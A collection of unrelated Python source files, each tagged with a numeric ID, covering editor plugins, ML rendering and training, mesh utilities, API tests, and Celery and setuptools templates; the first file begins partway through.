:type edit: sublime.Edit
:param to: target heading level
:type to: int
:param by: increment to change heading level by
:type by: int
:param select: whether to select heading text or not
:type select: bool
"""
if by is not None:
try:
by = int(by)
except (TypeError, ValueError):
logger.error("Invalid headings level step size specified!")
return
def calc_level(level):
return (level + by) % (self.MAX_LEVEL + 1)
self._set_level(edit, calc_level, select)
elif to is not None:
try:
to = max(0, min(self.MAX_LEVEL, int(to)))
except (TypeError, ValueError):
logger.error("Invalid headings level specified!")
return
def calc_level(level):
return to
self._set_level(edit, calc_level, select)
else:
logger.error("No headings level specified!")
def _set_level(self, edit, calc_level, select):
view = self.view
match_heading_hashes = view.settings().get("mde.match_heading_hashes")
pattern = re.compile(
r"""
(?x)
^([ \t>]*) # block quotes
(?:
(\#+) # leading hashes
(?: # optionally followed by ...
[ \t]+? # at least one space
( .*? ) # tokens not looking like trailing hashes
([ \t]+\#+[ \t]*$)? # maybe trailing hashes
)?
|
([^-+*].*?)? [ \t]* # no heading nor list item
)
$
"""
)
# One or more selections may span multiple lines each of them to change heading level for.
# To correctly handle caret placements split all selections into single lines first.
vsels = view.sel()
regions = [region for sel in vsels for region in view.split_by_newlines(sel)]
vsels.clear()
vsels.add_all(regions)
regions = []
for sel in vsels:
line = view.line(sel)
string = view.substr(line)
match = pattern.match(string)
if not match:
logger.debug(
"Change heading level ignored line %d: '%s'",
view.rowcol(line.a)[0] + 1,
string,
)
continue
bol = line.begin()
col = view.rowcol(sel.begin())[1]
quote, _, heading, _, text = match.groups()
old_level = match.end(2) - match.start(2)
new_level = calc_level(old_level)
leading = "#" * new_level + " " * bool(new_level)
heading = heading or text or ""
new_string = quote + leading + heading
if match_heading_hashes and new_level:
new_string += " " + "#" * new_level
view.replace(edit, line, new_string)
# convert to heading
if old_level < 1:
pt = bol + col + len(leading)
# caret was in front of heading
elif col <= match.end(1):
pt = bol + col
# caret after heading text
elif col > match.end(3):
pt = bol + len(leading) + len(heading)
# keep caret in relative horizontal position
else:
pt = bol + col + len(leading) - max(0, match.start(3) - match.start(2))
pt = min(max(bol, pt), view.line(bol).end())
regions.append(sublime.Region(pt, pt))
vsels.clear()
vsels.add_all(regions)
|
1709080
|
import os
from setuptools import setup, find_packages
def read(fname):
try:
with open(os.path.join(os.path.dirname(__file__), fname)) as fh:
return fh.read()
except IOError:
return ''
requirements = read('REQUIREMENTS').splitlines()
tests_requirements = read('REQUIREMENTS-TESTS').splitlines()
setup(
name="{{ package_name }}",
version="0.0.1",
description="",
long_description=read('README.rst'),
url='',
license='{{ license.name }}',
author='{{ author.name }}',
author_email='{{ author.email }}',
packages=find_packages(exclude=['tests']),
include_package_data=True,
classifiers=[
'Development Status :: 3 - Alpha',{{#license.classifier}}
'{{ license.classifier }}',{{/license.classifier}}
'Programming Language :: Python',
],
install_requires=requirements,
tests_require=tests_requirements,
)
|
1709101
|
from functools import wraps
from primehub.utils import reject_action
from primehub.utils.decorators import __requires_permission__, logger, __command_groups__
def has_permission_flag(cmd_args: dict):
k = "{}.{}".format(cmd_args['module'], cmd_args['func'])
if k in __requires_permission__:
return True
return False
def disable_reject_action(action):
logger.debug('@ask_for_permission is disabled, the action will pass %s', action)
reject_action_function = disable_reject_action
def enable_ask_for_permission_feature():
global reject_action_function
reject_action_function = reject_action
def ask_for_permission(func):
k = "{}.{}".format(func.__module__, func.__name__)
__requires_permission__[k] = ""
@wraps(func)
def wrapper(*args, **kwargs):
if not kwargs.get('--yes-i-really-mean-it', False):
cmd_args = None
try:
actions = __command_groups__[func.__module__]
cmd_args = [x for x in actions if x['func'] == func.__name__]
except BaseException:
pass
if cmd_args:
reject_action_function(cmd_args[0]['name'])
else:
reject_action_function(func.__name__)
return func(*args, **kwargs)
return wrapper
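# A minimal sketch (not part of the original module, guarded so it only runs as a script) of
# how the decorator above is meant to be used: without '--yes-i-really-mean-it' the configured
# reject_action_function is invoked before the wrapped command runs. With the feature disabled
# (the default here) that only logs; after enable_ask_for_permission_feature() it would reject.
# The delete_everything name is an illustrative assumption.
if __name__ == "__main__":  # pragma: no cover
    @ask_for_permission
    def delete_everything(**kwargs):
        return "deleted"

    # no confirmation flag: goes through the reject/ask path first
    delete_everything()
    # explicitly confirmed: runs straight away
    delete_everything(**{'--yes-i-really-mean-it': True})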
|
1709103
|
import torch
import numpy as np
from tqdm import tqdm
import time
from PIL import Image
import os
from im2mesh.common import (
arange_pixels, transform_to_camera_space)
class Renderer(object):
''' Render class for DVR.
It provides functions to render the representation.
Args:
model (nn.Module): trained DVR model
threshold (float): threshold value
device (device): pytorch device
colors (string): which type of color to use (default: rgb)
resolution (tuple): output resolution
n_views (int): number of views to generate
extension (string): output image extension
background (string): which background color to use
ray_sampling_accuracy (tuple): how many evaluations should be
performed on the ray
n_start_view (int): at which item in the batch the rendering
process should be started
'''
def __init__(self, model, threshold=0.5, device=None, colors='rgb',
resolution=(128, 128), n_views=3, extension='png',
background='white', ray_sampling_accuracy=[1024, 1025],
n_start_view=0):
self.model = model.to(device)
self.threshold = threshold
self.device = device
self.colors = colors
self.n_views = n_views
self.extension = extension
self.resolution = resolution
self.sampling_accuracy = ray_sampling_accuracy
self.n_start_view = n_start_view
# assumed default: estimate_colors() splits vertices by this attribute, which is
# otherwise never initialized
self.points_batch_size = 100000
if background == 'white':
self.background = 1.
elif background == 'black':
self.background = 0.
else:
self.background = 0.
def render_and_export(self, data, img_out_path, modelname='model0',
return_stats=True):
''' Renders and exports for provided camera information in data.
Args:
data (tensor): data tensor
img_out_path (string): output path
modelname (string): name of the model
return_stats (bool): whether stats should be returned
'''
self.model.eval()
device = self.device
stats_dict = {}
inputs = data.get('inputs', torch.empty(1, 0)).to(device)
with torch.no_grad():
c = self.model.encode_inputs(inputs)
if not os.path.exists(img_out_path):
os.makedirs(img_out_path)
out_imgs = []
for i in tqdm(range(self.n_start_view,
self.n_start_view + self.n_views)):
datai = data.get('img.img%d' % i, None)
if datai is None:
print('No image %d found.' % i)
break
img = datai[None]
batch_size, _, h, w = img.shape
assert(batch_size == 1)
world_mat = datai.get('world_mat').to(device)
camera_mat = datai.get('camera_mat').to(device)
scale_mat = datai.get('scale_mat').to(device)
t0 = time.time()
with torch.no_grad():
img_pred = self.render_img(
camera_mat, world_mat, inputs, scale_mat, c, stats_dict,
resolution=self.resolution)
stats_dict['time_render'] = time.time() - t0
img_pred.save(os.path.join(
img_out_path, '%s_%03d.%s' % (modelname, i, self.extension)))
out_imgs.append(img_pred)
return inputs.cpu(), out_imgs, stats_dict
def render_img(self, camera_mat, world_mat, inputs, scale_mat=None,
c=None, stats_dict={}, resolution=(128, 128)):
''' Renders an image for provided camera information.
Args:
camera_mat (tensor): camera matrix
world_mat (tensor): world matrix
scale_mat (tensor): scale matrix
c (tensor): latent conditioned code c
stats_dict (dict): statistics dictionary
resolution (tuple): output image resolution
'''
device = self.device
h, w = resolution
t0 = time.time()
p_loc, pixels = arange_pixels(resolution=(h, w))
pixels = pixels.to(device)
stats_dict['time_prepare_points'] = time.time() - t0
if self.colors in ('rgb', 'depth'):
# Get predicted world points
with torch.no_grad():
t0 = time.time()
p_world_hat, mask_pred, mask_zero_occupied = \
self.model.pixels_to_world(
pixels, camera_mat, world_mat, scale_mat, c,
sampling_accuracy=self.sampling_accuracy)
stats_dict['time_eval_depth'] = time.time() - t0
t0 = time.time()
p_loc = p_loc[mask_pred]
with torch.no_grad():
if self.colors == 'rgb':
img_out = (255 * np.ones((h, w, 3))).astype(np.uint8)
t0 = time.time()
if mask_pred.sum() > 0:
rgb_hat = self.model.decode_color(p_world_hat, c=c)
rgb_hat = rgb_hat[mask_pred].cpu().numpy()
rgb_hat = (rgb_hat * 255).astype(np.uint8)
img_out[p_loc[:, 1], p_loc[:, 0]] = rgb_hat
img_out = Image.fromarray(img_out).convert('RGB')
elif self.colors == 'depth':
img_out = (255 * np.ones((h, w))).astype(np.uint8)
if mask_pred.sum() > 0:
p_world_hat = p_world_hat[mask_pred].unsqueeze(0)
d_values = transform_to_camera_space(
p_world_hat, camera_mat, world_mat,
scale_mat).squeeze(0)[:, -1].cpu().numpy()
m = d_values[d_values != np.inf].min()
M = d_values[d_values != np.inf].max()
d_values = 0.5 + 0.45 * (d_values - m) / (M - m)
d_image_values = d_values * 255
img_out[p_loc[:, 1], p_loc[:, 0]] = \
d_image_values.astype(np.uint8)
img_out = Image.fromarray(img_out).convert("L")
stats_dict['time_eval_color'] = time.time() - t0
return img_out
def export(self, img_list, img_out_path, modelname='model0'):
''' Exports the image list.
Args:
img_list (list): list of images
img_out_path (string): output path
modelname (string): model name
'''
model_path = os.path.join(img_out_path, modelname)
if not os.path.exists(model_path):
os.makedirs(model_path)
for i in range(self.n_views):
out_file = os.path.join(model_path, '%06d.png' % i)
img_list[i].save(out_file)
return 0
def estimate_colors(self, vertices, c=None):
''' Estimates the colors for provided vertices.
Args:
vertices (Numpy array): mesh vertices
c (tensor): latent conditioned code c
'''
device = self.device
vertices = torch.FloatTensor(vertices)
vertices_split = torch.split(vertices, self.points_batch_size)
colors = []
for vi in vertices_split:
vi = vi.to(device)
with torch.no_grad():
ci = self.model.decode_color(vi, c).squeeze(0).cpu()
colors.append(ci)
colors = np.concatenate(colors, axis=0)
colors = np.clip(colors, 0, 1)
colors = (colors * 255).astype(np.uint8)
colors = np.concatenate([
colors,
np.full((colors.shape[0], 1), 255, dtype=np.uint8)], axis=1)
return colors
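# Typical use (illustrative sketch; the output path, model name and view count are
# placeholders): construct the renderer with a trained DVR model and render the views
# stored in a data batch.
#
#     renderer = Renderer(model, device=device, n_views=3, resolution=(128, 128))
#     inputs, images, stats = renderer.render_and_export(data, '/tmp/renders', 'model0')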
|
1709147
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
from tqdm import tqdm
from abc import ABCMeta, abstractmethod
import paddle
import paddle.nn as nn
from paddle.io import DataLoader
from paddlemm.models import CMML, NIC, SCAN, SGRAF, AoANet, EarlyFusion, LateFusion, LMFFusion, TMCFusion, VSEPP, IMRAM
from paddlemm.datasets import BasicDataset, SemiDataset, PretrainDataset, SampleDataset
DatasetMap = {
'basic': BasicDataset,
'semi': SemiDataset,
'sample': SampleDataset,
'pretrain': PretrainDataset
}
ModelMap = {
'cmml': CMML,
'nic': NIC,
'scan': SCAN,
'vsepp': VSEPP,
'imram': IMRAM,
'sgraf': SGRAF,
'aoanet': AoANet,
'earlyfusion': EarlyFusion,
'latefusion': LateFusion,
'lmffusion': LMFFusion,
'tmcfusion': TMCFusion
}
class BaseTrainer(metaclass=ABCMeta):
def __init__(self, opt):
self.model_name = opt.model_name.lower()
self.out_root = opt.out_root
self.logger = opt.logger
self.num_epochs = opt.num_epochs
self.batch_size = opt.batch_size
self.learning_rate = opt.learning_rate
self.task = opt.task
self.weight_decay = opt.get('weight_decay', 0.)
self.pretrain_epochs = opt.get('pretrain_epochs', 0)
self.num_workers = opt.get('num_workers', 0)
self.val_epoch = opt.get('val_epoch', 1)
# choose metric for select best model during training
self.select_metric = opt.get('select_metric', 'loss')
# best validation results seen so far, compared against in train()
self.best_loss = float('inf')
self.best_score = float('-inf')
self.dataset = DatasetMap[opt.data_mode](**opt)
opt.vocab_size = self.dataset.vocab_size
opt.vocab = str(self.dataset.word2idx)
self.model = ModelMap[opt.model_name.lower()](**opt)
self.grad_clip = opt.get('grad_clip', 0)
if self.grad_clip:
self.grad_clip = nn.clip.ClipGradByValue(opt.grad_clip)
else:
self.grad_clip = None
self.step_size = opt.get('step_size', 0)
self.gamma = opt.get('gamma', 0.1)
if self.step_size:
self.scheduler = paddle.optimizer.lr.StepDecay(learning_rate=self.learning_rate, step_size=self.step_size,
gamma=self.gamma)
self.optimizer = paddle.optimizer.Adam(parameters=self.model.parameters(),
learning_rate=self.scheduler,
weight_decay=self.weight_decay,
grad_clip=self.grad_clip)
else:
self.optimizer = paddle.optimizer.Adam(parameters=self.model.parameters(),
learning_rate=self.learning_rate,
weight_decay=self.weight_decay,
grad_clip=self.grad_clip)
def train(self):
if self.pretrain_epochs > 0:
self.pretrain()
for epoch in range(1, self.num_epochs + 1):
all_loss = []
self.model.train()
train_loader = DataLoader(self.dataset.train_(),
batch_size=self.batch_size,
shuffle=True,
num_workers=self.num_workers)
train_tqdm = tqdm(train_loader(), ncols=80)
for idx, batch in enumerate(train_tqdm):
batch['epoch'] = epoch
loss = self.model(batch)
loss.backward()
self.optimizer.step()
self.optimizer.clear_grad()
all_loss.append(loss.item())
train_tqdm.set_description("Epoch: {} | Loss: {:.3f}".format(epoch, loss.item()))
train_tqdm.close()
if self.step_size:
self.scheduler.step()
paddle.save(self.model.state_dict(), os.path.join(self.out_root, 'temp.pdparams'))
if epoch % self.val_epoch == 0:
val_res = self.evaluate()
if self.select_metric == 'loss':
if val_res['loss'] < self.best_loss:
self.best_loss = val_res['loss']
paddle.save(self.model.state_dict(), os.path.join(self.out_root, 'best_model.pdparams'))
self.logger.info("Epoch: {}, valid loss: {:.3f}, Best: {:.3f}".format(epoch, val_res['loss'], self.best_loss))
else:
if val_res[self.select_metric] > self.best_score:
self.best_score = val_res[self.select_metric]
paddle.save(self.model.state_dict(), os.path.join(self.out_root, 'best_model.pdparams'))
self.logger.info("Epoch: {}, valid score: {:.3f}, Best: {:.3f}".format(epoch, val_res[self.select_metric],
self.best_score))
def pretrain(self):
# for cmml pretraining
self.model.train()
for epoch in range(1, self.pretrain_epochs + 1):
all_loss = []
train_loader = DataLoader(self.dataset.train_(),
batch_size=self.batch_size * 8, # mul 8 to train total supervised data
shuffle=True,
num_workers=self.num_workers)
train_tqdm = tqdm(train_loader(), ncols=80)
for idx, batch in enumerate(train_tqdm):
self.optimizer.clear_grad()
loss = self.model.pretrain(batch)
loss.backward()
self.optimizer.step()
all_loss.append(loss.item())
train_tqdm.set_description("Pretrain epoch: {} | Loss: {:.3f}".format(epoch, np.mean(all_loss)))
@abstractmethod
def evaluate(self):
pass
@abstractmethod
def test(self):
pass
|
1709150
|
class AppearanceAssetElement(Element,IDisposable):
""" An element that represents an appearance asset for use in composing material definitions. """
@staticmethod
def Create(document,name,asset):
"""
Create(document: Document,name: str,asset: Asset) -> AppearanceAssetElement
        Creates a new AppearanceAssetElement.
document: The document in which to create the AppearanceAssetElement.
name: The name of the AppearanceAssetElement.
asset: The rendering asset of the element.
Returns: The new AppearanceAssetElement.
Note that document will own this pointer,
you should access it without owning it.
"""
pass
def Dispose(self):
""" Dispose(self: Element,A_0: bool) """
pass
@staticmethod
def GetAppearanceAssetElementByName(doc,name):
"""
GetAppearanceAssetElementByName(doc: Document,name: str) -> AppearanceAssetElement
Gets an AppearanceAssetElement by name.
doc: Document containing the AppearanceAssetElement.
name: Name of the AppearanceAssetElement.
"""
pass
def getBoundingBox(self,*args):
""" getBoundingBox(self: Element,view: View) -> BoundingBoxXYZ """
pass
def GetRenderingAsset(self):
"""
GetRenderingAsset(self: AppearanceAssetElement) -> Asset
Gets the rendering asset for the appearance asset element.
Returns: The rendering asset held by this appearance asset element.
"""
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: Element,disposing: bool) """
pass
def setElementType(self,*args):
""" setElementType(self: Element,type: ElementType,incompatibleExceptionMessage: str) """
pass
def SetRenderingAsset(self,asset):
"""
SetRenderingAsset(self: AppearanceAssetElement,asset: Asset)
Sets the rendering asset for the appearance asset element.
asset: The new rendering asset.It should be an appearance asset.
"""
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
|
1709186
|
import math
import easing_functions as ef
from fontTools.misc.bezierTools import splitCubic, splitLine
from typing import List
eases = dict(
cei=ef.CubicEaseIn,
ceo=ef.CubicEaseOut,
ceio=ef.CubicEaseInOut,
qei=ef.QuadEaseIn,
qeo=ef.QuadEaseOut,
qeio=ef.QuadEaseInOut,
eei=ef.ExponentialEaseIn,
eeo=ef.ExponentialEaseOut,
eeio=ef.ExponentialEaseInOut,
sei=ef.SineEaseIn,
seo=ef.SineEaseOut,
seio=ef.SineEaseInOut,
bei=ef.BounceEaseIn,
beo=ef.BounceEaseOut,
beio=ef.BounceEaseInOut,
eleo=ef.ElasticEaseOut,
elei=ef.ElasticEaseIn,
elieo=ef.ElasticEaseInOut,
eleio=ef.ElasticEaseInOut)
def curve_pos_and_speed(curve, x):
x1000 = x*1000
for idx, (action, pts) in enumerate(curve.value):
if action in ["moveTo", "endPath", "closePath"]:
continue
last_action, last_pts = curve.value[idx-1]
if action == "curveTo":
o = -1
a = last_pts[-1]
b, c, d = pts
if x1000 == a[0]:
o = a[1]/1000
eb = a
ec = b
elif x1000 == d[0]:
o = d[1]/1000
eb = c
ec = d
elif x1000 > a[0] and x1000 < d[0]:
e, f = splitCubic(a, b, c, d, x1000, isHorizontal=False)
ez, ea, eb, ec = e
o = ec[1]/1000
else:
continue
tangent = math.degrees(math.atan2(ec[1] - eb[1], ec[0] - eb[0]) + math.pi*.5)
#print(o, tangent)
if tangent >= 90:
t = (tangent - 90)/90
else:
t = tangent/90
if o != -1:
return o, t
raise Exception("No curve value found!")
def ease(style, x):
"""
Though available as a general-purpose function, this logic is usually accessed through something like the `.progress` function on an animation or timeable.
    Return two values: the first is the easing result at the given time x; the second is the tangent to that, if calculable (it is not currently calculable for the mnemonics listed below)
for reference, easing mnemonics:
* cei = CubicEaseIn
* ceo = CubicEaseOut
* ceio = CubicEaseInOut
* qei = QuadEaseIn
* qeo = QuadEaseOut
* qeio = QuadEaseInOut
* eei = ExponentialEaseIn
* eeo = ExponentialEaseOut
* eeio = ExponentialEaseInOut
* sei = SineEaseIn
* seo = SineEaseOut
* seio = SineEaseInOut
* bei = BounceEaseIn
* beo = BounceEaseOut
* beio = BounceEaseInOut
* eleo = ElasticEaseOut
* elei = ElasticEaseIn,
* eleio = ElasticEaseInOut
"""
if style == "linear" or style == "lin" or style == "l":
return x, 0.5
e = eases.get(style)
if e:
return e().ease(x), 0.5
    elif hasattr(style, "moveTo"):
        return style.ease_t(x), 0.5
    elif type(style).__name__ == "Glyph":
        from coldtype.pens.draftingpen import DraftingPen
        p = DraftingPen().glyph(style)
        return p.ease_t(x), 0.5
    else:
        raise Exception("No easing function with that mnemonic")
def _loop(t, times=1, cyclic=True, negative=False):
lt = t*times*2
ltf = math.floor(lt)
ltc = math.ceil(lt)
lt = lt - ltf
if cyclic and ltf%2 == 1:
if negative:
lt = -lt
else:
lt = 1 - lt
return lt, ltf
def ez(t, easefn="eeio", loops=0, cyclic=True, rng=(0, 1)):
t = max(0, min(1, t))
if loops > 0:
t, _ = _loop(t, times=loops, cyclic=cyclic)
e, _ = ease(easefn, t)
ra, rb = rng
if ra > rb:
e = 1 - e
rb, ra = ra, rb
return ra + e*(rb - ra)
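# Illustrative usage sketch, not part of the original module: "seio" is the
# SineEaseInOut mnemonic from the `eases` table above; the sample times and
# the (10, 20) output range are arbitrary.
if __name__ == "__main__":
    for t in (0.0, 0.25, 0.5, 0.75, 1.0):
        value, tangent = ease("seio", t)
        scaled = ez(t, easefn="seio", rng=(10, 20))
        print(f"t={t:.2f} eased={value:.3f} tangent={tangent} range-mapped={scaled:.2f}")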
|
1709192
|
class TestFunctional:
def test_create_domain(self, client):
headers = {"X-Api-Key": "123"}
# create user
data = {"email": "<EMAIL>"}
post_res = client.post("/api/user/add", data=data, headers=headers)
json_data = post_res.get_json()
user_id = json_data["data"]["id"]
# add domain
data = {"zone": "company.com", "user_id": user_id}
res = client.post("/api/domain/add", data=data, headers=headers)
create_domain_data = res.get_json()
# list domain
res = client.get("/api/domain/list", headers=headers)
list_domain_data = res.get_json()
assert create_domain_data["code"] == 201
assert create_domain_data["data"]["zone"] == "company.com"
assert list_domain_data["code"] == 200
assert list_domain_data["data"][0]["zone"] == "company.com"
# 4: SOA, NS, NS, CNAME
assert len(list_domain_data["data"][0]["records"]) == 4
|
1709211
|
import numpy as np
#this is not an efficient implementation. just for testing!
def dual_contouring_47_test(int_grid, float_grid):
all_vertices = []
all_triangles = []
int_grid = np.squeeze(int_grid)
dimx,dimy,dimz = int_grid.shape
vertices_grid = np.full([dimx,dimy,dimz], -1, np.int32)
#all vertices
for i in range(0,dimx-1):
for j in range(0,dimy-1):
for k in range(0,dimz-1):
v0 = int_grid[i,j,k]
v1 = int_grid[i+1,j,k]
v2 = int_grid[i+1,j+1,k]
v3 = int_grid[i,j+1,k]
v4 = int_grid[i,j,k+1]
v5 = int_grid[i+1,j,k+1]
v6 = int_grid[i+1,j+1,k+1]
v7 = int_grid[i,j+1,k+1]
if v1!=v0 or v2!=v0 or v3!=v0 or v4!=v0 or v5!=v0 or v6!=v0 or v7!=v0:
#add a vertex
vertices_grid[i,j,k] = len(all_vertices)
pos = float_grid[i,j,k]+np.array([i,j,k], np.float32)
all_vertices.append(pos)
all_vertices = np.array(all_vertices, np.float32)
#all triangles
#i-direction
for i in range(0,dimx-1):
for j in range(1,dimy-1):
for k in range(1,dimz-1):
v0 = int_grid[i,j,k]
v1 = int_grid[i+1,j,k]
if v0!=v1:
if v0==0:
all_triangles.append([vertices_grid[i,j-1,k-1],vertices_grid[i,j,k],vertices_grid[i,j,k-1]])
all_triangles.append([vertices_grid[i,j-1,k-1],vertices_grid[i,j-1,k],vertices_grid[i,j,k]])
else:
all_triangles.append([vertices_grid[i,j-1,k-1],vertices_grid[i,j,k-1],vertices_grid[i,j,k]])
all_triangles.append([vertices_grid[i,j-1,k-1],vertices_grid[i,j,k],vertices_grid[i,j-1,k]])
#j-direction
for i in range(1,dimx-1):
for j in range(0,dimy-1):
for k in range(1,dimz-1):
v0 = int_grid[i,j,k]
v1 = int_grid[i,j+1,k]
if v0!=v1:
if v0==0:
all_triangles.append([vertices_grid[i-1,j,k-1],vertices_grid[i,j,k-1],vertices_grid[i,j,k]])
all_triangles.append([vertices_grid[i-1,j,k-1],vertices_grid[i,j,k],vertices_grid[i-1,j,k]])
else:
all_triangles.append([vertices_grid[i-1,j,k-1],vertices_grid[i,j,k],vertices_grid[i,j,k-1]])
all_triangles.append([vertices_grid[i-1,j,k-1],vertices_grid[i-1,j,k],vertices_grid[i,j,k]])
#k-direction
for i in range(1,dimx-1):
for j in range(1,dimy-1):
for k in range(0,dimz-1):
v0 = int_grid[i,j,k]
v1 = int_grid[i,j,k+1]
if v0!=v1:
if v0==0:
all_triangles.append([vertices_grid[i-1,j-1,k],vertices_grid[i-1,j,k],vertices_grid[i,j,k]])
all_triangles.append([vertices_grid[i-1,j-1,k],vertices_grid[i,j,k],vertices_grid[i,j-1,k]])
else:
all_triangles.append([vertices_grid[i-1,j-1,k],vertices_grid[i,j,k],vertices_grid[i-1,j,k]])
all_triangles.append([vertices_grid[i-1,j-1,k],vertices_grid[i,j-1,k],vertices_grid[i,j,k]])
all_triangles = np.array(all_triangles, np.int32)
return all_vertices, all_triangles
def write_obj_triangle(name, vertices, triangles):
fout = open(name, 'w')
for ii in range(len(vertices)):
fout.write("v "+str(vertices[ii,0])+" "+str(vertices[ii,1])+" "+str(vertices[ii,2])+"\n")
for ii in range(len(triangles)):
fout.write("f "+str(int(triangles[ii,0]+1))+" "+str(int(triangles[ii,1]+1))+" "+str(int(triangles[ii,2]+1))+"\n")
fout.close()
def write_ply_triangle(name, vertices, triangles):
fout = open(name, 'w')
fout.write("ply\n")
fout.write("format ascii 1.0\n")
fout.write("element vertex "+str(len(vertices))+"\n")
fout.write("property float x\n")
fout.write("property float y\n")
fout.write("property float z\n")
fout.write("element face "+str(len(triangles))+"\n")
fout.write("property list uchar int vertex_index\n")
fout.write("end_header\n")
for ii in range(len(vertices)):
fout.write(str(vertices[ii,0])+" "+str(vertices[ii,1])+" "+str(vertices[ii,2])+"\n")
for ii in range(len(triangles)):
fout.write("3 "+str(triangles[ii,0])+" "+str(triangles[ii,1])+" "+str(triangles[ii,2])+"\n")
fout.close()
def write_ply_point(name, vertices):
fout = open(name, 'w')
fout.write("ply\n")
fout.write("format ascii 1.0\n")
fout.write("element vertex "+str(len(vertices))+"\n")
fout.write("property float x\n")
fout.write("property float y\n")
fout.write("property float z\n")
fout.write("end_header\n")
for ii in range(len(vertices)):
fout.write(str(vertices[ii,0])+" "+str(vertices[ii,1])+" "+str(vertices[ii,2])+"\n")
fout.close()
def write_ply_point_normal(name, vertices, normals=None):
fout = open(name, 'w')
fout.write("ply\n")
fout.write("format ascii 1.0\n")
fout.write("element vertex "+str(len(vertices))+"\n")
fout.write("property float x\n")
fout.write("property float y\n")
fout.write("property float z\n")
fout.write("property float nx\n")
fout.write("property float ny\n")
fout.write("property float nz\n")
fout.write("end_header\n")
if normals is None:
for ii in range(len(vertices)):
fout.write(str(vertices[ii,0])+" "+str(vertices[ii,1])+" "+str(vertices[ii,2])+" "+str(vertices[ii,3])+" "+str(vertices[ii,4])+" "+str(vertices[ii,5])+"\n")
else:
for ii in range(len(vertices)):
fout.write(str(vertices[ii,0])+" "+str(vertices[ii,1])+" "+str(vertices[ii,2])+" "+str(normals[ii,0])+" "+str(normals[ii,1])+" "+str(normals[ii,2])+"\n")
fout.close()
def read_intersectionpn_file_as_2d_array(name):
fp = open(name, 'rb')
line = fp.readline().strip()
if not line.startswith(b'#intersectionpn'):
raise IOError('Not an intersectionpn file')
dims = list(map(int, fp.readline().strip().split(b' ')[1:]))
point_nums = np.array(list(map(int, fp.readline().strip().split(b' '))),np.int32)
line = fp.readline()
data = np.frombuffer(fp.read(), dtype=np.float32)
data = data.reshape([np.sum(point_nums),6])
fp.close()
separated = []
count = 0
for i in range(len(point_nums)):
separated.append(np.ascontiguousarray(data[count:count+point_nums[i]]))
count += point_nums[i]
return separated
def read_sdf_file_as_3d_array(name):
fp = open(name, 'rb')
line = fp.readline().strip()
if not line.startswith(b'#sdf'):
raise IOError('Not a sdf file')
dims = list(map(int, fp.readline().strip().split(b' ')[1:]))
line = fp.readline()
data = np.frombuffer(fp.read(), dtype=np.float32)
data = data.reshape(dims)
fp.close()
return data
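# Illustrative usage sketch, not part of the original utilities: run the
# brute-force dual contouring above on a small sphere occupancy grid and
# export the resulting mesh as a PLY file (grid size and radius are arbitrary).
if __name__ == "__main__":
    dim = 16
    xs, ys, zs = np.meshgrid(np.arange(dim), np.arange(dim), np.arange(dim), indexing='ij')
    dist = np.sqrt((xs - dim / 2) ** 2 + (ys - dim / 2) ** 2 + (zs - dim / 2) ** 2)
    int_grid = (dist < dim / 3).astype(np.int32)
    float_grid = np.full([dim, dim, dim, 3], 0.5, np.float32)  # one vertex per cell, at its center
    vertices, triangles = dual_contouring_47_test(int_grid, float_grid)
    write_ply_triangle("sphere_dc.ply", vertices, triangles)
    print("wrote", len(vertices), "vertices and", len(triangles), "triangles")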
|
1709253
|
import os
import os.path
import torch
from utils.data_aug import Lighting
from torchvision import datasets, transforms
class Dataloder():
def __init__(self, config):
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
transform_train = transforms.Compose([
transforms.Resize(256),
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ColorJitter(0.4,0.4,0.4),
transforms.ToTensor(),
Lighting(0.1),
normalize,
])
transform_test = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
normalize,
])
trainset = datasets.ImageFolder(os.path.join(config.dataset_path, 'train'), transform_train)
testset = datasets.ImageFolder(os.path.join(config.dataset_path, 'test'), transform_test)
kwargs = {'num_workers': 8, 'pin_memory': True} if config.cuda else {}
trainloader = torch.utils.data.DataLoader(trainset, batch_size=
config.batch_size, shuffle=True, **kwargs)
testloader = torch.utils.data.DataLoader(testset, batch_size=
config.batch_size, shuffle=False, **kwargs)
self.trainloader = trainloader
self.testloader = testloader
self.classes = trainset.classes
def getloader(self):
return self.classes, self.trainloader, self.testloader
if __name__ == "__main__":
data_dir = 'dataset/gtos-mobile'
trainset = datasets.ImageFolder(os.path.join(data_dir, 'train'))
testset = datasets.ImageFolder(os.path.join(data_dir, 'test'))
print(trainset.classes)
print(len(testset))
|
1709261
|
def c_star(x, β, γ):
return (1 - β ** (1/γ)) * x
def v_star(x, β, γ):
return (1 - β**(1 / γ))**(-γ) * (x**(1-γ) / (1-γ))
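# Illustrative numeric check (parameter values are arbitrary): with discounting,
# the closed-form policy above consumes a fixed fraction (1 - beta**(1/gamma))
# of the remaining stock x each period.
if __name__ == "__main__":
    x, beta, gamma = 2.5, 0.96, 1.5
    print("optimal consumption c*(x):", c_star(x, beta, gamma))
    print("value function v*(x):", v_star(x, beta, gamma))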
|
1709388
|
import time
import sys
from sdk.actions import *
if __name__ == "__main__":
print_all_domains("0lt017548f8774f9602b4e25743050d3a8ab37f1341")
sys.exit(-1)
    print(get_domain_on_sale())
|
1709414
|
from __future__ import print_function
import digdag
def echo_params():
print('digdag params')
for k, v in digdag.env.params.items():
print(k, v)
|
1709422
|
import os
from celery import Celery
from django.conf import settings
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'openwisp2.settings')
app = Celery('openwisp2')
app.config_from_object('django.conf:settings', namespace='CELERY')
app.autodiscover_tasks()
{% if openwisp2_django_celery_logging %}
from celery.signals import setup_logging
from logging.config import dictConfig
@setup_logging.connect
def config_loggers(*args, **kwargs):
dictConfig(settings.LOGGING)
{% else %}
if hasattr(settings, 'RAVEN_CONFIG'):
from raven.contrib.celery import register_logger_signal, register_signal
from raven.contrib.django.raven_compat.models import client
register_logger_signal(client)
register_signal(client, ignore_expected=True)
{% endif %}
|
1709423
|
